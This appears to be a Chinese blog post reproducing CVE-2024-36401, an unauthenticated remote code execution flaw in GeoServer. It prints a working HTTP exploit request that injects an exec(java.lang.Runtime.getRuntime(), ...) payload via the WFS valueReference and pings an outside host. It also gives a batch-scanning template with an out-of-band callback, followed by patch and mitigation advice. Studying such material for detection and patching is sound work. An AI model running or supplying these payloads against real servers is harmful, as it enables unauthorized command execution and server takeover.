【漏洞复现】Geoserver远程代码执行漏洞(CVE-2024-36401)

最新推荐文章于 2024-07-10 08:14:11 发布
最新推荐文章于 2024-07-10 08:14:11 发布
阅读量1.4k 收藏 9
点赞数 8
分类专栏: 漏洞复现 文章标签: 安全 RCE Geoserver CVE
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53009585/article/details/140145144
版权

文章目录

漏洞描述

GeoServer是一个用Java编写的开源软件服务器,允许用户共享和编辑地理空间数据。它为提供交互操作性而设计,使用开放标准发布来自任何主要空间数据源的数据。

GeoServer存在远程代码执行漏洞(CVE-2024-36401),未经身份认证的远程攻击者可以通过该漏洞在服务器上执行任意代码,从而获取服务器权限。

漏洞名称Geoserver远程代码执行漏洞
CVE编码CVE-2024-36401
漏洞类型代码执行
漏洞等级高危
公开时间2024-07-02

影响版本

GeoServer < 2.23.6

2.24.0 <= GeoServer < 2.24.4

2.25.0 <= GeoServer < 2.25.2

利用条件

无需任何利用条件

漏洞复现

POST /geoserver/wfs HTTP/1.1
Host: ip
Content-Type: application/xml
Content-Length: 339

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'
 valueReference='exec(java.lang.Runtime.getRuntime(),"ping dgrh3.cn -c 1")'>
 <wfs:Query typeNames='topp:states'/>
</wfs:GetPropertyValue>

在这里插入图片描述

批量脚本

id: CVE-2024-36401-GeoServer-wfs-rce

info:
  name: GeoServer 远程代码执行漏洞(CVE-2024-36401)
  author: whgojp
  severity: critical
  description: GeoServer 远程代码执行漏洞(CVE-2024-36401)

http:
- raw:
  - |-
    @timeout: 30s
    POST /geoserver/wfs HTTP/1.1
    Host: {{Hostname}}
    Content-Type: application/xml
    Content-Length: 324

    <wfs:GetPropertyValue service='WFS' version='2.0.0'
     xmlns:topp='http://www.openplans.org/topp'
     xmlns:fes='http://www.opengis.net/fes/2.0'
     xmlns:wfs='http://www.opengis.net/wfs/2.0'
     valueReference='exec(java.lang.Runtime.getRuntime(),"ping {{interactsh-url}}")'>
     <wfs:Query typeNames='topp:states'/>
    </wfs:GetPropertyValue>

  max-redirects: 3
  matchers-condition: and
  matchers:
      - type: word
        words:
          - "dns"
        part: interactsh_protocol

修复建议

GeoServer已经发布先前版本的补丁,可以从下载页面(https://geoserver.org/)下载:2.25.1、2.24.3、2.24.2、2.23.2、2.21.5、2.20.7、2.20.4、2.19.2、2.18.0,从下载的补丁中获取gt-app-schema和gt-complex和 gt-xsd-core jar文件,替换掉WEB-INF/lib里面对应的文件即可。

临时缓解措施

删除GeoServer 中gt-complex-x.y.jar文件(x.y为GeoTools 版本,例如GeoServer 2.25.1中是gt-complex-31.1.jar),这将从 GeoServer 中删除漏洞代码,但可能会破坏某些 GeoServer 功能。

参考链接

https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv
https://osgeo-org.atlassian.net/browse/GEOT-7587
https://github.com/vulhub/vulhub/pull/540/files#diff-f83989e1a9d69179df696bc01c04fbf62ba914325457bef67c1d95fb63772e91

An0nymouer
关注
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
GeoServer /geoserver/wms接口存在远程命令执行漏洞
nnn2188185的博客
05-22 520
GeoServer /geoserver/wms接口存在远程命令执行漏洞
geoserver-2.18-SNAPSHOT-mbtiles-plugin.zip
12-05
Geoserver默认是不支持MBTilers数据的,但其官网也给我们提供扩展jar包,我们只需官网下载对应的扩展jar即可,如果你的Geoserver没有配置过wps服务,需要额外下载包(需要下对应自己的版本即可),然后再去下载...
Goby漏洞利用优化 | GeoServer远程代码执行漏洞CVE-2024-36401)(支持回显命令执行、内存马)
m0_46699477的博客
07-09 307
GeoSverver 远程代码执行漏洞 CVE-2024-36401:GeoSverver Tools 库的 API 在处理要素类型的属性名称时,会将这些属性名称不安全地传递给 commons-jxpath 库进行解析,由于 commons-jxpath 库在解析 XPath 表达式时可以执行任意代码,从而导致未经身份验证的用户能够利用特定的 OGC 请求参数远程执行代码
CVE-2024-23692:Rejetto HFS 2.x 远程代码执行漏洞[附POC]
薛定谔嘚喵博客
06-14 1137
Rejetto HTTP文件服务器是一个轻量级的HTTP服务器软件,它允许用户在本地计算机上快速搭建一个文件共享服务。2024年6月,互联网上披露其 2.x系列 存在CVE-2024-23692 远程代码执行漏洞,该漏洞源于存在模板注入漏洞,允许远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令。
GeoServer SQL 注入漏洞复现CVE-2024-25157)附poc_geoserverl漏洞
2401_84253380的博客
06-24 438
1.访问http://yourip:8080/geoserver进入首页2.获取每个功能名称在进行注入之前,首先要获取地理图层列表信息,这是sql注入payload中的一个必要参数访问以下url获取:标签中的信息,就是地理图层列表。这里选择作为地理图层列表信息3.获取功能的属性将上一步获取的typeName的name属性值拼接到url中,构成url如下:4.构造SQL 注入利用这些已知参数,拼接成payload:成功获取到数据库版本号。
未公开 GeoServer开源服务器wfs远程命令执行漏洞复现(CVE-2024-36401)
小司机的奥拓
07-03 725
资源分享包含但不限于网上未公开的day漏洞(更新漏洞POC共500+),2024最新企业SRC/CNVD/Edu实战挖掘技巧报告,红队内网横向渗透,代码审计,JS逆向,SRC培训等课程。
Goby漏洞发布|GeoServer远程代码执行漏洞CVE-2024-36401)【漏洞复现
m0_46699477的博客
07-03 613
GeoSverver 远程代码执行漏洞 CVE-2024-36401:GeoSverver Tools 库的 API 在处理要素类型的属性名称时,会将这些属性名称不安全地传递给 commons-jxpath 库进行解析,由于 commons-jxpath 库在解析 XPath 表达式时可以执行任意代码,从而导致未经身份验证的用户能够利用特定的 OGC 请求参数远程执行代码
GeoServer远程代码执行漏洞复现(CVE-2024-36401)
qq_26229345的博客
07-08 1840
文章仅供参考,本文所提供的信息只为网络安全人员对自己所负责的网站、服务器等进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责!
GeoServer漏洞CVE-2023-25157)
m0_73605862的博客
12-04 1248
3.然后进行模糊搜索写入,利用了布尔注入进行注入,返回结果。通过绕过前面的strStartsWith语句然后在后面查询了版本,并且变成了数字。1.了解了一下这个geoserver的请求规范,顺便了解一下这个网页的请求规范以及返回结果是什么。4.修改注入语句,不知道返回成功了没有(好奇第一条数据有这么长吗),用了另外一种也返回的这个。然乎知道漏洞是用户在输入的时候可能不规范造成的sql注入,并且这个还支持模糊查询。前半部分是sql注入一些语句的测试,后面是漏洞复现和利用。1.查看user 表。
【严重】GeoServer 存在 sql 注入漏洞(POC已公开)
murphysec的博客
06-19 1869
GeoServer是一款开源地图服务器,主要用于发布、共享和处理各种地理空间数据。在GeoServer 的受影响版本中由于未对用户传入的 CQL_FILTER参数进行安全校验,在以数据库作为数据存储时,攻击者可构造攻击语句,绕过GeoServer语法解析,通过sql注入获取数据库敏感信息。在GeoServer默认配置中,内置图层数据存放在文件中,不受此漏洞影响,若应用程序创建自定义图层并使用外置数据库才会受此漏洞影响。
GeoServer 存在 sql 注入漏洞
murphysec的博客
03-01 2854
GeoServer 是一个允许用户共享和编辑地理空间数据的开源软件服务器,支持 OGC Filter expression 和 OGC Common Query Language 语言,使用 PostGIS Datastore 作为数据库。PostGIS是PostgreSQL数据库的扩展程序,增加了数据库对地理对象的支持。
geoserver-2.20-SNAPSHOT-authkey-plugin.zip
09-01
客户端在请求受保护的资源时,需要在请求头中携带这个AuthKey,GeoServer会验证这个键的有效性,只有通过验证的请求才会被允许继续执行。 总的来说,GeoServer 2.20-SNAPSHOT AuthKey 插件通过引入基于密钥的身份...
CVE-2023-25157-main(1).zip
07-19
总而言之,CVE-2023-25157是一个涉及GeoServer的SQL注入漏洞,通过复现漏洞,我们可以更好地理解其风险,并采取必要的措施来保护我们的系统。提供的压缩包文件包含的信息将有助于这一过程,对于学习安全防护和提升...
geoserver-2.15-SNAPSHOT-gwc-sqlite-plugin.zip
09-27
总之,"geoserver-2.15-SNAPSHOT-gwc-sqlite-plugin.zip" 提供了一种将SQLite数据库和MBTiles格式集成到GeoServer的GWC中的方式,这对于那些希望在离线环境中或者需要高效、轻量级地图服务的场景下尤其有用。...
geoserver-manager-1.8-SNAPSHOT.rar
09-16
在"geoserver-manager-1.8-SNAPSHOT.rar"这个压缩包中,包含了GeoServer Manager的1.8-SNAPSHOT版本。这个版本可能包含了对GeoServer的最新改进和优化,例如提升性能、增加新功能或者修复已知问题。安装和使用这个...
【靶机实战】GeoServer 远程代码执行漏洞复现
最新发布
qq_21039641的博客
07-10 861
CVE-2024-36401是一个高危的远程代码执行漏洞,存在于GeoServer软件中。GeoServer是一个用Java编写的开源服务器,用于共享和编辑地理空间数据。该漏洞允许未经身份验证的远程攻击者通过构造特定的请求,在服务器上执行任意代码,从而可能获取服务器的控制权。这个漏洞2024年7月2日被公开,影响多个版本的GeoServer,包括2.24.0至2.24.3以及2.25.0至2.25.1。
CVE-2024-36401 GeoServer rce 分析
weixin_52381874的博客
07-05 360
GeoServer 是一个开源服务允许用户共享和编辑地理空间数据。在版本 2.23.6、2.24.4 和 2.25.2 之前,多个 OGC 请求参数允许未经身份验证的用户通过针对默认 GeoServer 安装的特制输入进行远程代码执行RCE),因为将属性名称评估为 XPath 表达式会不安全GeoServer 调用的 GeoTools 库 API 评估要素类型的属性/属性名称,从而不安全地将它们传递给 commons-jxpath 库,该库在评估 XPath 表达式时可以执行任意代码
1day速达软件NET接口处存在RCE漏洞
weixin_43167326的博客
05-07 799
速达软件专注中小企业管理软件,产品涵盖进销存软件,财务软件,ERP软件,CRM系统,项目管理软件,OA系统,仓库管理软件等,是中小企业管理市场的佼佼者,提供产品、技术、服务等信息,百万企业共同选择。速达软件全系产品存在任意文件上传漏洞,未经身份认证得攻击者可以通过此漏洞上传恶意后门文件,执行任意指令,造成服务器失陷。
geoserver xxe漏洞
09-02
Geoserver是一个开源的地理信息系统(GIS)软件,它用于发布和共享地理数据和服务。然而,Geoserver在某些情况下可能存在一个称为XXE(XML外部实体)漏洞。 XXE漏洞是一种安全漏洞,攻击者可以利用该漏洞来读取本地或远程服务器上的文件。这种漏洞通常是由于应用程序在处理XML输入时,对外部实体的处理不当而引起的。 具体到Geoserver的XXE漏洞,它可能会受到XML实体注入攻击。攻击者可以通过向Geoserver发送包含恶意XML实体引用的请求,来读取系统上的敏感文件或执行任意代码。 为了防止Geoserver XXE漏洞的利用,有几个关键的步骤可以采取: 1. 更新Geoserver:确保您使用的是最新版本的Geoserver。开源软件的维护者通常会修复已知的漏洞,并在新版本中发布修复程序。 2. 安全的配置文件处理:确保Geoserver的配置文件中没有不必要的文件,因为攻击者可能会利用这些文件访问敏感信息。 3. 过滤和验证用户输入:在输入和输出时,对用户提交的XML数据进行充分验证和过滤。这将有助于防止输入的恶意XML实体被执行。 4. 强化安全意识:向Geoserver用户和管理员提供适当的培训,以提高他们对安全问题的意识。这将有助于减少社会工程学攻击和恶意操作。 总之,Geoserver XXE漏洞是一种可以利用的安全漏洞,但通过更新软件、安全配置文件处理、过滤验证用户输入和提高安全意识,可以有效地减少这种漏洞的风险。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值